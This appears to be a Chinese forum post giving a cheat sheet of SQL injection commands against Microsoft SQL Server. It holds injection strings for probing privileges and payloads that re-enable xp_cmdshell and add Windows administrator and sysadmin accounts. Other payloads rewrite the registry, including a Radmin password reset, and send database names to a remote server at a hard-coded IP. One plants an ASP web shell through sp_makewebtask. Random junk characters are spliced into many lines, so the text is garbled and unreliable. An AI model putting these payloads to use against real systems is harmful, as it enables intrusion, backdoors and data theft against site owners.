阿Ｄ常用的一些注入命令

admin

阿Ｄ常用的一些注入命令
//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
0 j% e% V- L5 G9 vAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--

1 X/ q7 L- \2 G8 Y) k//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
9 N' P3 Y7 A2 E2 S1 S3 BAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
1 i; m. O: ]# Q+ y
6 B# {( H( ~" A2 d4 i( q0 B
数字类型
# X& t# i6 ]; f% d' ?2 I4 zand char(124)%2Buser%2Bchar(124)=0

字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='
( T' f% }; T1 b' v5 f3 d
- A# k. x' D4 g& y搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='

爆用户名
" A! i5 m; _6 O; S/ p0 c: U5 Eand user>0
' and user>0 and ''='
! [' T3 Y4 b" z4 E0 M: g$ J2 |
检测是否为SA权限
+ o  d& Q# u# V" `: ~& C4 p2 Gand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
, B/ b6 h7 J/ a' y
检测是不是MSSQL数据库
+ ]4 F+ _5 W" L# }* _" U8 X( ?" Wand exists (select * from sysobjects);--

$ e; T+ i9 {7 \& U# e检测是否支持多行
, \% Q* U% f# {2 i! p9 U;declare @d int;--
. F# p' i* Q% S$ b/ Z" o0 g! G9 O
# k8 A5 m  Q# ~, v* q: e1 R) a3 u恢复 xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--

0 [: S! B9 Y4 }+ ^0 C
: a, d% |# f7 c3 [5 ]select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
$ s( L2 m7 v: [# C0 c, z
//-----------------------
0 m! s* \! t4 V3 J$ B3 x//      执行命令
//-----------------------
& X- Z" `' t) {: _$ [首先开启沙盘模式：
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
0 u" \! ?6 K, c- n0 s& y2 \- K
然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

! F9 s4 b/ K- \执行命令
1 x* U7 V# I$ ]9 M;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--

EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
, A% {( s" _/ ]% Y9 s1 _: L/ |
0 Q* R1 t& L; o# k9 ]  x4 H# `判断xp_cmdshell扩展存储过程是否存在：
7 e% ^" X2 r. `3 l, ]http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
% y0 O$ v+ h  {( Z: J
写注册表
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
8 S3 [/ B+ v1 U- r# {! |' _# {% z
REG_SZ

) I- k7 {; D. X1 f读注册表
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
. B# a7 [7 s& t) I
读取目录内容
exec master..xp_dirtree 'c:\winnt\system32\',1,1


( y) Q, T% A+ R' r! G数据库备份
' n/ |& Z/ B; s+ D* d% ~backup database pubs to disk = 'c:\123.bak'
! I( u' ^. I* \$ D
//爆出长度
0 L5 k# X. Q4 A7 f5 V8 \$ qAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--

# p, n4 z* n* ~

更改sa口令方法：用sql综合利用工具连接后，执行命令：
+ @7 L2 h4 x7 ?exec sp_password NULL,'新密码','sa'
2 e/ x$ F1 Q8 q/ N$ C5 ?* r
4 ^; A8 [4 b* S6 K) f0 t. P添加和删除一个SA权限的用户test：
) S7 ^/ P) f) w! W) dexec master.dbo.sp_addlogin test,ptlove
! b6 y, A1 I. n2 n4 k* T8 G: x) Texec master.dbo.sp_addsrvrolemember test,sysadmin

( r- m/ F# f- V9 S4 l7 B4 X: d- q7 x删除扩展存储过过程xp_cmdshell的语句:
5 G8 X' P5 ^8 Q; A) N( dexec sp_dropextendedproc 'xp_cmdshell'

添加扩展存储过过程
5 S. Y) q9 ~* C$ HEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
GRANT exec On xp_proxiedadata TO public


" B: C" A6 w+ W) ^7 f停掉或激活某个服务。

0 [% _9 v( P: zexec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'

- F5 {4 E, A" _' ?  R% [$ v7 E) hdbo.xp_subdirs
, i3 L( w$ M! f* E+ v! c# e
只列某个目录下的子目录。
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'

dbo.xp_makecab

将目标多个档案压缩到某个目标档案之内。
" A* D6 |2 A5 F, u  R所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。

3 v  Z% B) R9 M1 D0 g  w) M/ }dbo.xp_makecab
/ m2 w# c7 K, c( B; S5 E6 q'c:\test.cab','mszip',1,
# J) G$ }% ^7 I; ?! H1 I: R'C:\Inetpub\wwwroot\SQLInject\login.asp',
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

% K+ x8 {* `8 w, R/ Jxp_terminate_process

- Q% v. F1 w! x5 i停掉某个执行中的程序，但赋予的参数是 Process ID。
利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID

) h. u2 j' O. \& Txp_terminate_process 2484

/ o  w$ L2 D! v9 {xp_unpackcab
: u$ `( B- Z7 ?2 L5 D
解开压缩档。

xp_unpackcab 'c:\test.cab','c:\temp',1
5 K. V9 S9 O) j. H3 m, J2 E/ A

  W+ N3 R8 u' K) v某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
; c9 z, Z4 {7 A# r) a
create database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);

//得到数据库名
. @# A1 g- a; f2 Pinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases

5 ^, o2 ~+ G; C
//在Master中创建表，看看权限怎样
; I4 W' F* N) uCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--

用 sp_makewebtask直接在web目录里写入一句话马：
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--

+ n: T4 b! F5 i" W$ i: G//更新表内容
Update films SET kind = 'Dramatic' Where id = 123

: ^. ?$ m  F0 @8 n7 {$ _" A//删除内容
delete from table_name where Stockid = 3